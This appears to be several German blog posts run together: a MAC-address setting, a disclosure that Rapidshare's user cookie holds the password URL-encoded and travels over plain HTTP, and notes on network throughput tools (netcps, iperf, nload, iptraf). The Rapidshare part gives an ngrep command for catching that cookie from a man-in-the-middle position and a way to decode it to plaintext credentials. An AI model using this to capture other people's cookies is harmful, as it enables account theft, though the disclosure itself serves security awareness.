hwaddress ether 02:01:02:03:04:08

Danach ein:

/etc/init.d/networking restart

Ich möchte hier die Schwachstelle der Rapidshare Authentifizierung durch das user-Cookie aufzeigen. Das hier ist *keine* Anleitung zum sniffen von Rapidshare Zugangsdaten.

Wir nehmen einen Premium Account und loggen uns bei Rapidshare ein.
Das erste was auffällt: https. Das heißt für einen MITM-Angriff ist hier bereits Schluss (bzw. nicht unbedingt, man siehe sich das dsniff Package an) da die übertragenen Daten mittels SSL verschlüßelt werden.

Haben wir uns eingeloggt, kommt der interessanteste Teil: Das user-Cookie von Rapidshare. Das sieht folgendermaßen aus:

4108813-%67%73%55%6D%45%57%56

Wie man bereits sehen kann, ist das Passwort entsprechend des ASCII-Zeichensatzes maskiert.

Tippt folgendes in die Firefox Adressleiste ein:

javascript:unescape('4108813-%67%73%55%6D%45%57%56');

unescape() wandelt die maskierten Zeichen in richtige Zeichen um. Das Ergebnis sind eure Zugangsdaten in Plaintext.

Nun möchte ich zeigen, wie leicht es ist, Traffic nach diesem Cookie zu analysieren. Wir gehen davon aus, das wir eingehenden Traffic (z.b. MITM / Proxy / Gateway) an unserem Netzwerkinterface haben, den wir mittels ngrep analysieren:

ngrep -q -W byline -d any "Cookie: user=" port 80 | grep "Cookie: "

Was die entsprechenden Parameter bedeuten, bezieht Ihr bitte aus der Man-Page.

Das Ergebnis:

match: Cookie: user=
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
Cookie: user=4108813-%67%73%55%6D%45%57%56.
...

Bei jedem Download wird das user-Cookie an die Rapidshare Server übermittelt. Da dies mittels HTTP passiert – und somit nicht verschlüßelt ist – ist es jedem der zwischen Client und Server steht möglich, die Zugangsdaten zu ermitteln.

Durch diese Schwachstelle sind nicht nur die Persönlichen Daten des Rapidshare-Benutzers gefährdet, sondern eben auch dessen Account selbst.

Unter Windows gibt es das Freeware Server-Client Programm netcps (Download) das eine normale TCP/IP-Verbindung nutzt um ohne Festplattenzugriff Daten zu versenden und empfangen.

Server

Auf dem Server starten wir das Programm mit folgendem Parameter:

netcps.exe -server

Client

Auf dem Client starten wir das Programm ebenfalls, übergeben aber mit “-m500″ die Anzahl der zu übertragenen Daten in Megabyte an. Der zweite Parameter ist die IP des Servers, der auf dem Standardport 4455 lauscht:

netcps.exe -m500 192.168.0.40

In meinem 1Gbit-Netzwerk erziele ich dabei im Durchschnitt 90MB/s:

Linux

Für Linux gibt es das freie Programm iperf, das von der Anwendung her fast gleich ist.

Server

iperf -s

Client

iperf -c 192.168.0.4

Ergebnis zwischen meinem Router und meinem Fileserver:

nload zeigt in einer einfachen textbasierten Statistik die aktuelle Netzwerklast an.

iptraf zeigt in einer ncurses-Oberfläche viele Informationen der Netzwerkschnittstelle an, z.b. aktuell bestehende TCP/IP-Sessions, Anzahl übertragener Bytes je IP, genutzte Bandbreite je Interface und vieles mehr.